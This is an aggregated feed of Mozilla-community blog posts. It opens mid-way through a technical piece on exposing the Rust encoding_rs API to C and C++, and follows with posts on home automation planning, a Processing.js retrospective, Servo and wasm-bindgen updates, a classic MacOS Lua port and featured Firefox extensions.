Rust:  dst: &mut [u8]
C++:   gsl::span<uint8_t> dst

Rust:  &mut vec[..]
C++:   gsl::make_span(vec)

Rust:  std::slice::from_raw_parts(ptr, len)
C++:   gsl::make_span(ptr, len)

Rust:  for item in slice {}
C++:   for (auto&& item : span) {}

Rust:  slice[i]
C++:   span[i]

Rust:  slice.len()
C++:   span.size()

Rust:  slice.as_ptr()
C++:   span.data()

GSL relies on C++14, but at the time encoding_rs landed, Gecko was stuck on C++11 thanks to Android. Since GSL could not be used as-is in Gecko, I backported gsl::span to C++11 as mozilla::Span. The porting process was mainly a matter of ripping out constexpr keywords and using mozilla:: types and type traits in addition to or instead of standard-library ones. After Gecko moved to C++14, some of the constexpr keywords have been restored.

Once we had our own mozilla::Span anyway, it was possible to add Rust-like subspan ergonomics that are missing from gsl::span. For the case where you want a subspan from index i up to but not including index j, gsl::span has:

Rust:       &slice[i..]
gsl::span:  span.subspan(i)

Rust:       &slice[..i]
gsl::span:  span.subspan(0, i)

Rust:       &slice[i..j]
gsl::span:  span.subspan(i, j - i) 😭

mozilla::Span instead has:

Rust:           &slice[i..]
mozilla::Span:  span.From(i)

Rust:           &slice[..i]
mozilla::Span:  span.To(i)

Rust:           &slice[i..j]
mozilla::Span:  span.FromTo(i, j)

gsl::span and Rust slices have one crucial difference in how they decompose into a pointer and a length. For a zero-length gsl::span it is possible for the pointer to be nullptr. In the case of Rust slices, the pointer must always be non-null and aligned even for zero-length slices. This may look counter-intuitive at first: When the length is zero, the pointer never gets dereferenced, so why does it matter whether it is null or not? It turns out that it matters for optimizing out the enum discriminant in Option-like enums. None is represented by all-zero bits, so if wrapped in Some(), a slice with null as the pointer and zero as the length would accidentally have the same representation as None. By requiring the pointer to be a potentially bogus non-null pointer, a zero-length slice inside an Option can be represented distinctly from None without a discriminant. By requiring the pointer to be aligned, further uses of the low bits of the pointer are possible when the alignment of the slice element type is greater than one.
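
This niche optimization is easy to observe in a standalone snippet (not code from encoding_rs):

use std::mem::size_of;

fn main() {
    // Because a slice's pointer can never be null, None can use the
    // all-zero representation and Option adds no extra discriminant.
    assert_eq!(size_of::<Option<&[u8]>>(), size_of::<&[u8]>());
}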

After realizing that it’s not okay to pass the pointer obtained from C++ gsl::span::data() to Rust std::slice::from_raw_parts() as-is, it was necessary to decide where to put the replacement of nullptr with reinterpret_cast<T*>(alignof(T)). There are two candidate locations when working with actual gsl::span: In the Rust code that provides the FFI or in the C++ code that calls the FFI. When working with mozilla::Span, the code of the span implementation itself could be changed, so there are two additional candidate locations for the check: the constructor of mozilla::Span and the getter for the pointer.

Of these four candidate locations, the constructor of mozilla::Span seemed like the one where the compiler has the best opportunity to optimize out the check in some cases. That’s why I chose to put the check there. This means that in the gsl::span scenario the check had to go in the code that calls the FFI. All pointers obtained from gsl::span have to be laundered through:

template <class T>
static inline T* null_to_bogus(T* ptr)
{
    return ptr ? ptr : reinterpret_cast<T*>(alignof(T));
}

Additionally, this means that since the check is not in the code that provides the FFI, the C API became slightly unidiomatic in the sense that it requires C callers to avoid passing in NULL even when the length is zero. However, the C API already has many caveats about things that are Undefined Behavior, and adding yet another thing that is documented to be Undefined Behavior does seem like an idiomatic thing to do with C.

Putting it Together

Let’s look at an example of how the above features combine. First, in Rust we have a method that takes a slice and returns an optional tuple:

impl Encoding {
    pub fn for_bom(buffer: &[u8]) ->
        Option<(&'static Encoding, usize)>
    {
        if buffer.starts_with(b"\xEF\xBB\xBF") {
            Some((UTF_8, 3))
        } else if buffer.starts_with(b"\xFF\xFE") {
            Some((UTF_16LE, 2))
        } else if buffer.starts_with(b"\xFE\xFF") {
            Some((UTF_16BE, 2))
        } else {
            None
        }
    }
}

Since this is a static method, there is no reference to self and no corresponding pointer in the FFI function. The slice decomposes into a pointer and a length. The length becomes an in/out param that communicates the length of the slice in and the length of the BOM subslice out. The encoding becomes the return value, and the encoding pointer being null communicates the Rust None case for the tuple.

#[no_mangle]
pub unsafe extern "C" fn encoding_for_bom(buffer: *const u8,
                                          buffer_len: *mut usize)
                                          -> *const Encoding
{
    let buffer_slice =
        ::std::slice::from_raw_parts(buffer, *buffer_len);
    let (encoding, bom_length) =
        match Encoding::for_bom(buffer_slice) {
        Some((encoding, bom_length)) =>
            (encoding as *const Encoding, bom_length),
        None => (::std::ptr::null(), 0),
    };
    *buffer_len = bom_length;
    encoding
}

In the C header, the signature looks like this:

ENCODING_RS_ENCODING const*
encoding_for_bom(uint8_t const* buffer, size_t* buffer_len);

The C++ layer then rebuilds the analog of the Rust API on top of the C API:

class Encoding final {
public:
    static inline std::optional<
        std::tuple<gsl::not_null<const Encoding*>, size_t>>
    for_bom(gsl::span<const uint8_t> buffer)
    {
        size_t len = buffer.size();
        const Encoding* encoding =
            encoding_for_bom(null_to_bogus(buffer.data()), &len);
        if (encoding) {
            return std::make_tuple(
                gsl::not_null<const Encoding*>(encoding), len);
        }
        return std::nullopt;
    }
};

Here we have to explicitly use std::make_tuple, because the implicit constructor doesn’t work when the std::tuple is nested inside std::optional.

Algebraic Types

Early on, we saw that the Rust-side streaming API can return this enum:

pub enum DecoderResult {
    InputEmpty,
    OutputFull,
    Malformed(u8, u8),
}

C++ now has an analog for Rust enum, sort of: std::variant<Types...>. In practice, though, std::variant is so clunky that it does not make sense to use it when a Rust enum is supposed to act in a lightweight way from the point of view of ergonomics.

First, the variants in std::variant aren’t named. They are identified positionally or by type. Named variants were proposed as lvariant but did not get accepted. Second, even though duplicate types are permitted, working with them is not practical. Third, there is no language-level analog for Rust’s match. A match-like mechanism was proposed as inspect() but was not accepted.

On the FFI/C layer, the information from the above enum is packed into a u32. Instead of trying to expand it to something fancier on the C++ side, the C++ API uses the same uint32_t as the C API. If the caller actually cares about extracting the two small integers in the malformed case, it’s up to the caller to do the bitwise ops to extract them from the uint32_t.

The FFI code looks like this:

pub const INPUT_EMPTY: u32 = 0;

pub const OUTPUT_FULL: u32 = 0xFFFFFFFF;

fn decoder_result_to_u32(result: DecoderResult) -> u32 {
    match result {
        DecoderResult::InputEmpty => INPUT_EMPTY,
        DecoderResult::OutputFull => OUTPUT_FULL,
        DecoderResult::Malformed(bad, good) =>
            ((good as u32) << 8) | (bad as u32),
    }
}

Using zero as the magic value for INPUT_EMPTY is a premature micro-optimization. On some architectures comparison with zero is cheaper than comparison with other constants, and the values representing the malformed case when decoding and the unmappable case when encoding are known not to overlap zero.

Signaling Integer Overflow

Decoder and Encoder have methods for querying worst-case output buffer size requirement. The caller provides the number of input code units and the method returns the smallest output buffer length, in code units, that guarantees that the corresponding conversion method will not return OutputFull.

E.g. when encoding from UTF-16 to UTF-8, calculating the worst case involves multiplication by three. Such a calculation can, at least in principle, result in integer overflow. In Rust, integer overflow is considered safe, because even if you allocate too short a buffer as a result of its length computation overflowing, actually accessing the buffer is bounds-checked, so the overall result is safe. However, buffer access is not generally bounds-checked in C or C++, so an integer overflow in Rust can result in memory unsafety in C or C++ if the result of the calculation that overflowed is used for deciding the size of buffers allocated and accessed by C or C++ code. In the case of encoding_rs, even when C or C++ allocates the buffer, the writing is supposed to be performed by Rust code, so it might be OK. However, to be sure, the worst-case calculations provided by encoding_rs use overflow-checking arithmetic.

In Rust, the methods whose arithmetic is overflow-checked return Option<usize>. To keep the types of the C API simple, the C API returns size_t with SIZE_MAX signaling overflow. That is, the C API effectively appears as using saturating arithmetic.
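
On the FFI layer, that mapping might look roughly like this sketch (the exact method and function names in encoding_rs may differ):

#[no_mangle]
pub unsafe extern "C" fn decoder_max_utf16_buffer_length(
    decoder: *const Decoder,
    byte_length: usize) -> usize
{
    // usize::MAX (SIZE_MAX on the C side) signals overflow.
    (*decoder)
        .max_utf16_buffer_length(byte_length)
        .unwrap_or(::std::usize::MAX)
}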

In the C++ API version that uses standard-library types, the return type is std::optional<size_t>. In Gecko, we have a wrapper for integer types that provides overflow-checking arithmetic and a validity flag. In the Gecko version of the C++ API, the return type is mozilla::CheckedInt<size_t> so that dealing with overflow signaling is uniform with the rest of Gecko code. (Aside: I find it shocking and dangerous that the C++ standard library still does not provide a wrapper similar to mozilla::CheckedInt in order to do overflow-checking integer math in a standard-supported Undefined Behavior-avoiding way.)

Recreating the Non-Streaming API

Let’s look again at the example of a non-streaming API method on Encoding:

impl Encoding {
    pub fn decode_without_bom_handling_and_without_replacement<'a>(
        &'static self,
        bytes: &'a [u8],
    ) -> Option<Cow<'a, str>>
}

The type inside the Option in the return type is Cow<'a, str>, which is a type that holds either an owned String or a borrowed string slice (&'a str) whose data is owned by someone else. The lifetime 'a of the borrowed string slice is the lifetime of the input slice (bytes: &'a [u8]), because in the borrow case the output is actually borrowed from the input.

Mapping this kind of return type to C poses problems. First of all, C does not provide a great way to say that we either have the owned case or we have the borrowed case. Second, C does not have a standard type for heap-allocated strings that know their length and capacity and that can reallocate their buffer when modified. Maybe this could be seen as an opportunity to create a new C type whose buffer is managed by Rust String, but then such a type would not fit together with C++ strings. Third, a borrowed string slice in C would be a raw pointer and a length and some documentation that says that the pointer is valid only as long as the input pointer is valid. There would be no language-level safeguards against use-after-free.

The solution is not to provide the non-streaming API on the C layer at all. On the Rust side, the non-streaming API is a convenience API built on top of the streaming API and some validation functions (ASCII validation, UTF-8 validation, ISO-2022-JP ASCII state validation). Instead of trying to provide FFI bindings for the non-streaming API in an inconvenient manner, a similar non-streaming API can be recreated in C++ on top of the streaming API and the validation functions that were suitable for FFI.

While the C++ type system could represent the same kind of structure as Rust’s Cow<'a, str> e.g. as std::variant<std::string_view, std::string>, such a C++ Cow would be unsafe, because the lifetime 'a would not be enforced by C++. While a std::string_view (or gsl::span) is (mostly) OK as an argument in C++, as a return type it’s a use-after-free waiting to happen. As with C, at best there would be some documentation saying that the output std::string_view is valid for as long as the input gsl::span is valid.

To avoid use-after-free risk, in the C++ API version that uses C++17 standard-library types, I simply ended up making the C++ decode_without_bom_handling_and_without_replacement() always copy and return a std::optional<std::string>.

In the case of Gecko though, it’s possible to do better while keeping things safe. Gecko uses XPCOM strings, which provide a variety of storage options, notably: dependent strings that (unsafely) borrow storage owned by someone else, auto strings that store short strings in an inline buffer, and shared strings that point to a heap-allocated reference-counted buffer.

In the case where the buffer to decode is in an XPCOM string that points to a reference-counted heap-allocated buffer and we are decoding to UTF-8 (as opposed to UTF-16), in the cases where we’d borrow in Rust (except for BOM removal cases), we can instead make the output string point to the same reference-counted heap-allocated buffer that the input points to (and increment the reference count). This is indeed what the non-streaming API for mozilla::Encoding does.

Compared to Rust, there is a limitation beyond the input string having to use reference-counted storage for the copy avoidance to work: The input must not have the UTF-8 BOM in the cases where the BOM is removed. While Rust can borrow a subslice of the input excluding the BOM, with XPCOM strings just incrementing a reference count only works if the byte content of the input and output is entirely the same. When the first three bytes need to be omitted, it’s not entirely the same.

While the C++ API version that uses C++17 standard library types builds the non-streaming API on top of the streaming API in C++, for added safety, the non-streaming part of mozilla::Encoding is not actually built on the streaming C++ API in C++ but built on top of the streaming Rust API in Rust. In Gecko, we have Rust bindings for XPCOM strings, so it’s possible to manipulate XPCOM strings from Rust.

Epilog: Do We Really Need to Hold Decoder and Encoder by Pointer?

Apart from having to copy in the non-streaming API due to C++ not having a safe mechanism for borrows, it’s a bit disappointing that instantiating Decoder and Encoder from C++ involves a heap allocation while Rust callers get to allocate these types on the stack. Can we get rid of the heap allocation for C++ users of the API?

The answer is that we could, but to do it properly we’d end up with the complexity of making the C++ build system generate constants by querying them from rustc.

We can’t return a non-C-like struct over the FFI by value, but given a suitably-aligned pointer to enough memory, we can write a non-C-like struct to memory provided by the other side of the FFI. In fact, the API supports this as an optimization of instantiating a new Decoder into a heap allocation made by Rust previously:

#[no_mangle]
pub unsafe extern "C" fn encoding_new_decoder_into(
    encoding: *const Encoding,
    decoder: *mut Decoder)
{
    *decoder = (*encoding).new_decoder();
}

Even though documentation says that encoding_new_decoder_into() should only be used with pointers to Decoder previously obtained from the API, in the case of Decoder, assigning with = would be OK even if the memory pointed to by the pointer was uninitialized, because Decoder does not implement Drop. That is, in C++ terms, Decoder in Rust does not have a destructor, so assignment with = does not do any clean-up with the assumption that the pointer points to a previous valid Decoder.

When writing a Rust struct that implements Drop into uninitialized memory, std::ptr::write() should be used instead of =. std::ptr::write() “overwrites a memory location with the given value without reading or dropping the old value”. Perhaps it would set a good example to use std::ptr::write() even in the above case, even though it’s not strictly necessary.
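
Such a variant might look like this (a sketch; for Decoder the behavior is equivalent to the assignment above):

#[no_mangle]
pub unsafe extern "C" fn encoding_new_decoder_into(
    encoding: *const Encoding,
    decoder: *mut Decoder)
{
    // Write without reading or dropping the old value, which stays
    // correct even if Decoder later gains a Drop implementation.
    ::std::ptr::write(decoder, (*encoding).new_decoder());
}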

When working with a pointer previously obtained from Rust Box, the pointer is aligned correctly and points to a sufficiently large piece of memory. If C++ is to allocate stack memory for Rust code to write into, we need to make the C++ code use the right size and alignment. The issue of communicating these two numbers from Rust to C++ is already where things start getting brittle.

The C++ code needs to discover the right size and alignment for the struct. These cannot be discovered by calling FFI functions, because C++ needs to know them at compile time. Size and alignment aren’t just constants that could be written manually in a header file once and forgotten. First of all, they change when the Rust structs change, so just writing them down has the risk of the written-down values getting out of sync with the real requirements as the Rust code changes. Second, the values differ on 32-bit architectures vs. 64-bit architectures. Third, and this is the worst, the alignment can differ from one 32-bit architecture to another. Specifically, the alignment of f64 is 8 on most targets, like ARM, MIPS and PowerPC, but the alignment of f64 is 4 on x86. If Rust gets an m68k port, even more variety of alignments across 32-bit platforms is to be expected.

It seems that the only way to get this right is to get the size and alignment information from rustc as part of the build process before the C++ code is built so that the numbers can be written in a generated C++ header file that the C++ code can then refer to. The simple way to do this would be to have the build system compile and run a tiny Rust program that prints out a C++ header with numbers obtained using std::mem::size_of and std::mem::align_of. This solution assumes that the build system runs on the architecture that the compilation is targeting, so this solution would break cross-compilation. That’s not good.
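
Such a generator might look roughly like this (a hypothetical helper, not something encoding_rs ships; as noted, it only reports correct numbers when run on the target architecture):

extern crate encoding_rs;

use encoding_rs::Decoder;
use std::mem::{align_of, size_of};

fn main() {
    // Print a C++ header with the target-specific constants.
    println!("// Generated file. Do not edit.");
    println!("#define DECODER_SIZE {}", size_of::<Decoder>());
    println!("#define DECODER_ALIGNMENT {}", align_of::<Decoder>());
}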

We need to extract target-specific size and alignment for a given struct from rustc but without having to run a binary built for the target. It turns out that rustc has a command-line option, -Zprint-type-sizes, that prints out the size and alignment of types. Unfortunately, the feature is nightly-only… Anyway, the most correct way to go about this would be to have a build script controlling C++ compilation first invoke rustc with that option, parse out the sizes and alignments of interest, and generate a C++ header file with the numbers as constants.

Or, since overaligning is permitted, we could trust that the struct will not have a SIMD member (alignment 16 for 128-bit vectors) and always align to 8. We could also check the size on 64-bit platforms, always use that and hope for the best (especially hope that whenever the struct grows in Rust, someone remembers to update the C++-visible size). But hoping for the best in memory matters kind of defeats the point of using Rust.

Anyway, assuming that we have constants DECODER_SIZE and DECODER_ALIGNMENT available to C++ somehow, we can do this:

class alignas(DECODER_ALIGNMENT) Decoder final
{
  friend class Encoding;
public:
  ~Decoder() {}
  Decoder(Decoder&&) = default;
private:
  unsigned char storage[DECODER_SIZE];
  Decoder() = default;
  Decoder(const Decoder&) = delete;
  Decoder& operator=(const Decoder&) = delete;
  // ...
};

Notably:

  • Instead of the constructor Decoder() being marked delete, it is marked default but still private.
  • Encoding is declared as a friend to grant it access to the above-mentioned constructor.
  • A public default move constructor is added.
  • A single private field of type unsigned char[DECODER_SIZE] is added.
  • Decoder itself is declared with alignas(DECODER_ALIGNMENT).
  • operator delete is no longer overloaded.

Then new_decoder() on Encoding can be written like this (and be renamed make_decoder to avoid unidiomatic use of the word “new” in C++):

class Encoding final
{
public:
  inline Decoder make_decoder() const
  {
    Decoder decoder;
    encoding_new_decoder_into(this, &decoder);
    return decoder;
  }
  // ...
};

And it can be used like this:

Decoder decoder = input_encoding->make_decoder();

Note that outside the implementation of Encoding, trying to just declare Decoder decoder; without initializing it right away is a compile-time error, because the constructor Decoder() is private.

Let’s unpack what’s happening:

  • The array of unsigned char provides storage for the Rust Decoder.
  • The C++ Decoder has no base class, virtual methods, etc., so there are no implementation-supplied hidden members and the address of a Decoder is the same as the address of its storage member, so we can simply pass the address of Decoder itself to Rust.
  • The alignment of unsigned char is 1, i.e. unrestricted, so alignas on the Decoder gets to determine the alignment.
  • The default trivial move constructor memmoves the bytes of the Decoder, and the Rust Decoder is OK to move.
  • The private default no-argument constructor makes it a compile error to try to declare a not-immediately-initialized instance of the C++ Decoder outside the implementation of Encoding.
  • Encoding, however, can instantiate an uninitialized Decoder and pass a pointer to it to Rust, so that Rust code can write the Rust Decoder instance into the C++-provided memory via the pointer.

Daniel PocockSmart home: where to start?

My home automation plans have been progressing and I'd like to share some observations I've made about planning a project like this, especially for those with larger houses.

With so many products and technologies, it can be hard to know where to start. Some things have become straightforward, for example, Domoticz can soon be installed from a package on some distributions. Yet this simply leaves people contemplating what to do next.

The quickstart

For a small home, like an apartment, you can simply buy something like the Zigate, a single motion and temperature sensor, a couple of smart bulbs and expand from there.

For a large home, you can also get your feet wet with exactly the same approach in a single room. Once you are familiar with the products, use a more structured approach to plan a complete solution for every other space.

The Debian wiki has started gathering some notes on things that work easily on GNU/Linux systems like Debian as well as Fedora and others.

Prioritize

What is your first goal? For example, are you excited about having smart lights or are you more concerned with improving your heating system efficiency with zoned logic?

Trying to do everything at once may be overwhelming. Make each of these things into a separate sub-project or milestone.

Technology choices

There are many technology choices:

  • Zigbee, Z-Wave or another protocol? I'm starting out with a preference for Zigbee but may try some Z-Wave devices along the way.
  • E27 or B22 (Bayonet) light bulbs? People in the UK and former colonies may have B22 light sockets and lamps. For new deployments, you may want to standardize on E27. Amongst other things, E27 is used by all the Ikea lamp stands and if you want to be able to move your expensive new smart bulbs between different holders in your house at will, you may want to standardize on E27 for all of them and avoid buying any Bayonet / B22 products in future.
  • Wired or wireless? Whenever you take up floorboards, it is a good idea to add some new wiring. For example, CAT6 can carry both power and data for a diverse range of devices.
  • Battery or mains power? In an apartment with two rooms and less than five devices, batteries may be fine but in a house, you may end up with more than a hundred sensors, radiator valves, buttons, and switches and you may find yourself changing a battery in one of them every week. If you have lodgers or tenants and you are not there to change the batteries then this may cause further complications. Some of the sensors have a socket for an optional power supply, battery eliminators may also be an option.

Making an inventory

Creating a spreadsheet table is extremely useful.

This helps estimate the correct quantity of sensors, bulbs, radiator valves and switches and it also helps to budget. Simply print it out, leave it under the Christmas tree and hope Santa will do the rest for you.

Looking at my own house, these are the things I counted in a first pass:

Don't forget to include all those unusual spaces like walk-in pantries, a large cupboard under the stairs, cellar, en-suite or enclosed porch. Each deserves a row in the table.

Sensors help make good decisions

Whatever the aim of the project, sensors are likely to help obtain useful data about the space and this can help to choose and use other products more effectively.

Therefore, it is often a good idea to choose and deploy sensors through the home before choosing other products like radiator valves and smart bulbs.

The smartest place to put those smart sensors

When placing motion sensors, it is important to avoid putting them too close to doorways where they might detect motion in adjacent rooms or hallways. It is also a good idea to avoid putting the sensor too close to any light bulb: if the bulb attracts an insect, it will trigger the motion sensor repeatedly. Temperature sensors shouldn't be too close to heaters or potential draughts around doorways and windows.

There are a range of all-in-one sensors available, some have up to six features in one device smaller than an apple. In some rooms this is a convenient solution but in other rooms, it may be desirable to have separate motion and temperature sensors in different locations.

Consider the dining and sitting rooms in my own house, illustrated in the floorplan below. The sitting room is also a potential 6th bedroom or guest room with sofa bed, the downstairs shower room conveniently located across the hall. The dining room is joined to the sitting room by a sliding double door. When the sliding door is open, a 360 degree motion sensor in the ceiling of the sitting room may detect motion in the dining room and vice-versa. It appears that 180 degree motion sensors located at the points "1" and "2" in the floorplan may be a better solution.

These rooms have wall-mounted radiators and fireplaces. To avoid any of these potential heat sources, the temperature sensors should probably be in the middle of the room.

This photo shows the proposed location for the 180 degree motion sensor "2" on the wall above the double door:

Summary

To summarize, buy a Zigate and a small number of products to start experimenting with. Make an inventory of all the products potentially needed for your home. Try to mark sensor locations on a floorplan, thinking about the type of sensor (or multiple sensors) you need for each space.

David HumphreyProcessing.js 2008-2018

Yesterday Pomax DM'ed me on Twitter to let me know he'd archived the Processing.js GitHub repo. He's been maintaining it mostly on his own for quite a while, and now with the amazing p5js project, there isn't really a need to keep it going.

I spent the rest of the day thinking back over the project, and reflecting on what it meant to me. Like everyone else in May 2008, I was in awe when John Resig wrote his famous reverse birthday present blog post, showing the world what he'd been hacking together:

I've decided to release one of my largest projects, in recent memory. Processing.js is the project that I've been alluding to for quite some time now. I've ported the Processing visualization language to JavaScript, using the Canvas element. I've been working on this project, off-and-on now, for the past 7 months.

It was nothing short of epic. I had followed the development of Processing since I was an undergrad. I remember stumbling into the aesthetics + computation group website at MIT in my first year, and becoming aware of the work of Ben Fry, John Maeda, Casey Reas and others. I was smitten. As a student studying both humanities and CS, I didn't know anyone else who loved computers and art, and here was an entire lab devoted to it. For many years thereafter, I followed along from afar, always amazed at the work people there were doing.

Then, in the fall of 2009, as part of my work with Mozilla, Chris Blizzard approached me about helping Al MacDonald (f1lt3r) to work on getting Processing.js to 1.0, and adding the missing 3D API via WebGL. In the lead-up to Firefox 3.7, Mozilla was interested in getting more canvas based tech on the web, and in finding performance and other bugs in canvas and WebGL. Processing.js, they thought, would help to bring a community of artists, designers, educators, and other visual coders to the web.

Was I interested!? Here was a chance to finally work alongside some of my technical heroes, and to get to contribute to a space I'd only ever looked at from the other side of the glass. "Yes, I'm interested." I remember getting my first email from Ben, who started to explain what Processing was--I didn't need any introductions.

That term I used Processing.js as the main open source project in my open source class. As Al and I worked on the code, I taught the students how things worked, and got them fixing small bugs. The code was not the easiest first web project for students: take a hybrid of Java and make it work, unmodified, in the browser, using DOM and canvas APIs. This was before transpilers, node, and the current JS ecosystem. If you want to learn the web though, there was no better way than to come at it from underneath like this.

I had an energetic group of students with a nice set of complementary skills. A few had been working with Vlad on 3D in the browser for a while, as he developed what would become WebGL. Andor Salga, Anna Sobiepanek, Daniel Hodgin, Scott Downe, Jon Buckley, and others would go on to continue working on it with me in our open source lab, CDOT.

Through 2009-11 we worked using the methods I'd learned from Mozilla: open bug tracker, irc, blogs, wikis, weekly community calls, regular dot-releases.

Because we were working in the open, and because the project had such an outsized reputation thanks to the intersections of "Ben & Casey" and Resig, all kinds of random (and amazing) people showed up in our irc channel. Every day someone new from the who's who of design, graphics, gaming, and the digital art worlds would pop in to show us a demo that had a bug, or to ask a question about how to make something work. I spent most of my time helping people debug things, and writing tests to put back into the project for performance issues, parser bugs, and API weirdness.

One day a musician and digital artist named Corban Brook showed up. He used Processing in his work, and was interested to help us fix some things he'd found while porting an old project. He never left. Over the months he helped us rewrite huge amounts of the code, taught us git, and became a big brother to many of the students. I learned a ton from him about git and JS.

Then there was the time this mathematician came into the channel, complaining about how poor our font code and bezier curve implementation were. It turned out he knew what he was talking about, and we never let him leave either. Pomax would go on to become one of the most important maintainers on the project, and a long time friend.

Another time an unknown nickname, "notmasteryet," appeared. He started submitting massive pull requests, but never really said anything. At one point he rewrote our entire Java-to-JavaScript parser from scratch and magically fixed hundreds of bugs we couldn't solve. "notmasteryet" turned out to be Yury Delendik, who would go on to join Mozilla and build every cool thing you've seen the web do in the past 10 years (pdf.js, shumway to name a few).

Being part of this eclectic mix of hackers and artists was intoxicating. Whatever skill one of you lacked, others in the group had it. At one point, the conversation moved toward how to use the browser to mix audio and visuals with processing.js. I had no idea how sound worked, but I did understand how to hack into Gecko and get the data, Corban was a master with FFTs, Al knew how to make the visuals work, and Yury knew everything the rest of us didn't.

We set out to see if we could connect all the dots, and began hacking on a new branch of our code that used a version of Firefox I modified to emit audio events. Our work would eventually be shipped in Firefox 4 as the Audio Data API, and lead to what is now the standardization of the Web Audio API. I still remember the first time we got all of our pieces working together in the browser, and Corban filmed it. Magic!

From there the group only got larger, and the ideas for processing.js more ambitious. With the addition of people like CJ and Bobby, we started building big demos for Mozilla, which doubled as massive performance tests for browsers trying to compete for speed with WebGL: Flight of the Navigator, No Comply. And these led to yet more browser APIs for gaming, like Pointer Lock and Gamepad.

Since then it's been amazing to watch all the places that processing.js has gone. Twitter has always been full of people discovering it, and sharing their work, not least because of John and Khan Academy using it in their curriculum. Years later, I even got to use it there with my own children to teach them to code.

I truly loved working on processing.js, probably more than any other project I've done in the past 10 years. It was my favourite kind of software to build for a few reasons:

  • we were implementing Ben's spec. All of our tests and decisions were based on "what does p5 do?" The freedom not to have to decide, but to simply execute, was liberating.
  • we had an enormous amount of pre-existing code to test, and slowly make work. There's no way I could have built processing.js from zero. But I love porting everyone's existing projects.
  • the project was totally based on tests: unit tests, performance tests, visual snapshot/ref tests, parser tests. I learned how to think about code in terms of tests by working on Mozilla, but I learned to love tests through processing.js
  • it could be run without installing anything. Every time we made something new work, you just had to hit Refresh in your browser. That sounds so obvious, but for the community of Java devs coming to the web via processing.js, it was eye opening.
  • we could put time and attention into docs, examples, and guides. Casey and Ben had done so much of this, and we learned a lot from their approach and style.
  • it let me move up and down the web stack. I spent as much time working on performance issues in Firefox as I did in JavaScript. We found a ton of things in WebGL (I was even able to find and get a security bounty for a bug with TypedArrays). I remember once sitting with Boris Zbarsky in Boston, and having him teach me, slowly, how to figure out why our code was falling off of the JIT tracing, and how to fix it. Eventually we got back on JIT, thanks to bz :)

While it's definitely time for processing.js to be archived and other projects to take its place, I wanted to at least say a proper goodbye. I'm thankful I got to spend so many years working in the middle of it, and to have had the chance to work with such a creative part of the internet.

Thanks, too, to Pomax for keeping the lights on years after the rest of us had gone to other projects.

And to processing.js, goodnight. Thanks for all the unit tests.

The Servo BlogThis Week In Servo 120

In the past week, we merged 78 PRs in the Servo organization’s repositories.

Planning and Status

Our roadmap is available online, including the overall plans for 2018.

This week’s status updates are here.

Notable Additions

  • danlrobertson added a bunch of documentation to the ipc-channel crate.
  • myfreeweb added FreeBSD support to the gaol crate.
  • gterzian implemented a background hang monitor that reports the hung backtrace.
  • ferjm made blob URLs support range requests.
  • Darkspirit updated the SSL certificate generation mechanism.
  • nox worked around a Cargo bug causing unnecessarily long rebuilds when switching between build targets.
  • CYBAI enabled the automated Service Worker testsuite.
  • Manishearth fixed some bugs preventing WebVR from working in Google Daydream.
  • ferjm suppressed a crash when playing media while GStreamer is not installed correctly.
  • asajeffrey improved the Magic Leap UI some more.
  • jdm fixed a bug causing some cached images to not be displayed correctly.
  • jdm avoided an issue with reading certain HTTP responses from the cache leading to blank pages.

New Contributors

  • Shubham Kumaram

Interested in helping build a web browser? Take a look at our curated list of issues that are good for new contributors!

Nick Fitzgeraldwasm-bindgen — how does it work?!

A month or so ago I gave a presentation on the inner workings of wasm-bindgen to the WebAssembly Community Group. A particular focus was the way that wasm-bindgen is forward-compatible with, and acts as a sort of polyfill for, the host bindings proposal. A lot of this material was originally supposed to appear in my SFHTML5 presentation, but time constraints forced me to cut it out.

Unfortunately, the presentation was not recorded, but you can view the slide deck below, or open it in a new window. Navigate between slides with arrow keys or space bar.

Will Kahn-GreeneSocorro: November 2018 happenings

Summary

Socorro is the crash ingestion pipeline for Mozilla's products like Firefox. When Firefox crashes, the Breakpad crash reporter asks the user if the user would like to send a crash report. If the user answers "yes!", then the Breakpad crash reporter collects data related to the crash, generates a crash report, and submits that crash report as an HTTP POST to Socorro. Socorro saves the crash report, processes it, and provides an interface for aggregating, searching, and looking at crash reports.

November was another busy month! This blog post covers what happened.

Read more… (5 mins to read)

Cameron KaiserSomething for the weekend: Classic MacOS Lua

First, a TenFourFox FPR11 update: the release is delayed until December 10-ish to coincide with the updated release date of Firefox 66/60.4 ESR. Unfortunately, due to my absence over the holidays this leaves very little development time for FPR12 in December, so the beta is not likely to emerge until mid-January. Issue 533 ("this is undefined") is still my biggest priority because of the large number of sites still using the tainted version of Uglify-ES, but I have not figured out a solution yet, and the 15-minutes-or-longer build time to reconstruct test changes in JavaScript if I touch any headers seriously slows debugging. If you've had issues with making new shipments in United Parcel Service's on-line shipping application, or getting into your Citibank account, this is that bug.

So in the meantime, since we're all classic Mac users here, try out MacLua, a new port of the Lua programming language to classic MacOS. I'm rather fond of Lua, which is an incredibly portable scripting language, ever since I learned it to write PalmOS applications in Plua (I maintained the Mac OS X cross-compiler for it). In fact, I still use Plua for my PalmOS-powered Hue light controller.

MacLua gives you a REPL you can type Lua into, and it will also run your Lua scripts, but it has two interesting features: first, you can use it as an MPW tool, and second, it allows plugins that could potentially connect it to the rest of the classic Mac Toolbox. The only included component is a simple one for querying Gestalt as an educational example, but components for TCP sockets through MacTCP or OpenTransport, or for displaying dialogue boxes and other kinds of system resources, would seem like a logical next step. One of the really nice things about Plua was that it included GUI and network primitives as built-in modules. The author of this port clearly has a similar idea in mind.

You can still compile Lua natively on 10.4, and that would probably be more useful if you wanted to write Lua scripts on an OS X Power Mac, but if you have a 68K or beige Power Mac around, this Lua port can run on systems as early as 7.1.2 (probably any 68020 System 7 Mac if you install the CFM-68K Runtime Enabler). I look forward to seeing how it evolves, and the fact that it was built with QEMU as a Mac emulator not only is good evidence of how functional QEMU's classic Mac emulation is getting, but also means there may be a chance at some other ports to the classic Mac OS in the future.

Mozilla Addons BlogDecember’s Featured Extensions

Pick of the Month: Full Screen for Firefox

by Stefan vd
Go full screen with a single click.

“This is what I was searching for and now I have it!”

Featured: Context Search

by Olivier de Broqueville
Search highlighted text on any web page using your preferred search engine. Just right-click (or Shift-click) on the text to launch the context menu. You can also perform searches using keywords in the URL address bar.

“Great add-on and very helpful! Thank you for the good work.”

Featured: Behind the Overlay Revival

by Iván Ruvalcaba
Simply click a button to close annoying pop-up overlays.

